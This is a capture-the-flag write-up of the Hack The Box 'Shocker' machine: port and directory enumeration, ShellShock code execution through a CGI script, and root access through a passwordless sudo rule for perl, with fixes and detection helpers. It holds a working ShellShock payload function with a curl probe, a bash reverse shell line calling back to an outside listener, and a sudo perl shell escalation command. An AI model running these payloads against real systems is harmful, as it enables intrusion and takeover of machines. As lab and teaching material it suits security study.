Vulnerability Explanation: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock."
Privilege Escalation Vulnerability: Insecure sudo configuration (the user shelly may run /usr/bin/perl as root without a password)
Vulnerability Fix: Upgrade Bash to a version patched against ShellShock, so that function definitions are no longer imported from arbitrary environment variables. Remove the NOPASSWD sudo rule for /usr/bin/perl and grant sudo access to interpreters only when unavoidable. More generally, always follow the principle of least privilege and the concept of separation of privileges.
Severity: Critical
An initial full-port nmap scan revealed Apache 2.4.18 on port 80 and OpenSSH 7.2p2 on the non-standard port 2222.
# Nmap 7.91 scan initiated Tue Nov 16 19:03:32 2021 as: nmap -sC -sV -v -p- -oN nmap/full 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.34s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
3398/tcp filtered sapcomm
10044/tcp filtered unknown
15794/tcp filtered unknown
25723/tcp filtered unknown
29621/tcp filtered unknown
33041/tcp filtered unknown
36919/tcp filtered unknown
40374/tcp filtered unknown
40801/tcp filtered unknown
45501/tcp filtered unknown
48906/tcp filtered unknown
55879/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 16 19:37:19 2021 -- 1 IP address (1 host up) scanned in 2026.90 seconds
The Shocker main page is shown below:
Fuzzing the website to find any existing directories (gobuster's -f flag appends a trailing slash to each request):
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/11/16 21:13:50 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]
The /cgi-bin/ directory itself returns a 403 (You don't have permission to access /cgi-bin/ on this server). That is expected: Apache maps /cgi-bin/ to a script directory and forbids listing it, but any script inside it can still be requested and executed, so the file names have to be brute-forced.
Enumerating further inside /cgi-bin/, this time looking for files with the extensions sh and cgi:
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,cgi -f
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,cgi
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/11/16 21:19:12 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]
The request for user.sh does not return the script's source but its output, i.e. the script was executed server-side as a CGI program:
Content-Type: text/plain
Just an uptime test script
19:20:42 up 4:24, 0 users, load average: 0.02, 0.02, 0.00
The live uptime line confirms that every request runs code on the host. A .sh CGI script is executed by Bash, and Apache's mod_cgi hands request headers such as User-Agent, Referer and Cookie to the script as environment variables (HTTP_USER_AGENT and so on). That is exactly the "environment set across a privilege boundary" situation ShellShock abuses.
Searching with searchsploit confirms there is a public ShellShock exploit for Apache mod_cgi. With a netcat listener on port 9001, the crafted request makes the box connect back with a shell as the web server user shelly:
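How the crafted request works, as an added example that is not part of the original write-up or of the searchsploit exploit. The payload is placed in the User-Agent header because mod_cgi exports it as HTTP_USER_AGENT; the leading `echo` terminates the (empty) CGI header block so Apache relays the command output instead of failing with a malformed-header error. The target URL, the command, and the sample access-log lines are constructed for illustration; the command can equally be a bash reverse shell back to the listener shown above (for example `/bin/bash -i >& /dev/tcp/10.10.16.8/9001 0>&1`).

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): build the ShellShock
# probe header, send it with curl, and spot such requests in Apache logs.

# Build the crafted environment value. Unpatched Bash treats a value that
# starts with "() {" as a function definition and keeps parsing (and
# executing) whatever follows the closing brace. The "echo" emits the blank
# line that ends the CGI header block, so the command output becomes the body.
shellshock_payload() {
    cmd="$1"
    printf '() { :; }; echo; /bin/bash -c "%s"' "$cmd"
}

# Send the payload via User-Agent (mod_cgi exports it as HTTP_USER_AGENT).
# URL and command are caller-supplied assumptions, e.g.
#   probe_shellshock http://10.10.10.56/cgi-bin/user.sh id
probe_shellshock() {
    url="$1"
    cmd="$2"
    curl -s -A "$(shellshock_payload "$cmd")" "$url"
}

# Detection side: the combined log format records the User-Agent, so a
# request whose headers carry the function-definition marker "() {" is a
# strong indicator of a ShellShock attempt. Takes a log file path.
flag_shellshock_requests() {
    grep -E '\(\) ?\{' "$1"
}

# Constructed sample log (not a real capture) to exercise the detector offline:
# one benign request and one carrying the payload above.
sample_log() {
    cat <<'EOF'
10.10.16.8 - - [16/Nov/2021:19:20:42 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.16.8 - - [16/Nov/2021:19:25:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; echo; /bin/bash -c \"id\""
EOF
}

# Stand-alone use:  bash shellshock.sh --probe http://target/cgi-bin/user.sh id
if [ "${1:-}" = "--probe" ]; then
    probe_shellshock "$2" "${3:-id}"
fi
```

If the probe returns the output of `id` as the response body, Bash behind the CGI is unpatched; a patched Bash simply ignores the trailing string and the script answers with its normal uptime text.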
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.56] 52132
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
user.txt
shelly@Shocker:/home/shelly$ cat user.txt && hostname && whoami && ip addr
cat user.txt && hostname && whoami && ip addr
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Shocker
shelly
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:6e:f9 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:6ef9/64 scope link
valid_lft forever preferred_lft forever
Running sudo -l shows which commands the user shelly may execute through sudo.
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Since shelly can run /usr/bin/perl as root without a password, spawning a shell from perl via sudo escalates to root.
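The escalation step and a small audit helper, as an added example that is not part of the original write-up. `escalate_via_perl` is the usual way to get a shell out of a sudo-able perl; `nopasswd_shell_escapes` reads `sudo -l` output and flags NOPASSWD targets whose basename is an interpreter or editor that can spawn a shell. The sudo -l text is embedded as a constructed sample copied from the output above, and the interpreter list is an assumption for illustration, not an exhaustive one.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up.

# The escalation itself: sudo runs perl as root (no password needed because
# of the NOPASSWD rule) and perl's exec replaces itself with a root bash.
escalate_via_perl() {
    sudo /usr/bin/perl -e 'exec "/bin/bash";'
}

# Audit helper: read `sudo -l` output on stdin and print every NOPASSWD
# target whose basename is a program that can trivially spawn a shell.
# The list is an assumption for illustration, not an exhaustive one.
nopasswd_shell_escapes() {
    grep 'NOPASSWD' \
      | grep -oE '(/[[:alnum:]_.+-]+)+' \
      | grep -E '/(perl|python[0-9.]*|ruby|lua|bash|sh|dash|zsh|vi|vim|nano|less|more|find|awk|env)$'
}

# Constructed sample: the sudo -l output obtained on Shocker.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
EOF
}

# On the box:  sudo -l | nopasswd_shell_escapes
# Offline check against the sample (prints /usr/bin/perl):
sample_sudo_l | nopasswd_shell_escapes
```

The audit deliberately keys on NOPASSWD entries: a rule that still requires shelly's password would not help an attacker who only holds a reverse shell as the web user. Once `escalate_via_perl` has run, `whoami` returns root and root.txt can be read from /root.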